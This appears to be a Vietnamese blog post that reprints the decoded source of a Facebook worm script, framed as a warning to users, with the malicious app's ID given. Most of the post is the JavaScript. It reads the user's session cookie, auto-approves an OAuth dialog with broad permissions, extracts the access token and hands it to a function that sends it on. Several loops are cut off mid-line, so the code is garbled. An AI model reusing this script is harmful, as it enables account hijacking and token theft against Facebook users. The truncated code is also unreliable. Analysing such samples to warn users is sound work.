Hôm nay tình cờ mình thấy cái code này mình đã Decode và lấy được full bộ mã code này. Đây là bộ mã code độc hại mà các bạn thường thấy trên Facebook. Một số người lợi dùng sự kém hiểu biết của người dùng để tung mã đọc nhằm lấy "Token" hoặc là tài khoản bạn bị vô thức theo dõi hoặc like một trang nào đó.
Mình share code để các nhằm mục đích tìm hiểu phương thức hoạt động. Không ủng hộ các bạn vào mục đích xấu :)
if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","apps.facebook.com","beta.facebook.com") >= 0){
var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
function uygulamaizinver(url){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
izinverhtml = document.createElement("html");
izinverhtml.innerHTML = xmlhttp.responseText;
if(izinverhtml.getElementsByTagName("form").length > 0){
izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
act = izinverhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinverhtml,act);
}
}
};
xmlhttp.open("GET", url, true);
xmlhttp.send();
}
function duzenlevegonder(formnesne,act){
izinverparams = "";
for(i=0;i 0){
izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
}
izinverparams.replace("&fb_dtsg","fb_dtsg");
izinverparams += "&__CONFIRM__=1";
formnesne = formnesne;
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
izinhtml = document.createElement("html");
izinhtml.innerHTML = xmlhttp.responseText;
if(izinhtml.getElementsByTagName("form").length > 0){
izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
act = izinhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinhtml,act)
}else{
sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
if (sex[1]) {
tokenyolla(sex[1]);
}
}
}
};
xmlhttp.open("POST", act , true);
xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send(izinverparams);
}
function TokenUrl(id){
return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + 121876164619130 +"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
}
if(!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])){
uygulamaizinver(TokenUrl("121876164619130"));
var http = new XMLHttpRequest();
http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
http['send']();
var get = JSON.parse(http['responseText']);
var isim = get.name;
}
window.setInterval(function(){
if(document.getElementsByClassName("_5ce")){
for(i=0;i
ID: 121876164619130 mà mình bôi đỏ là Link ứng dụng của nó các bạn nhé.
Các bạn có thể kiểm tra tại đây: http://graph.facebook.com/121876164619130
Chúc các bạn phòng tránh những con worm này hiểu quả để không bị ảnh hưởng trên facebook :)
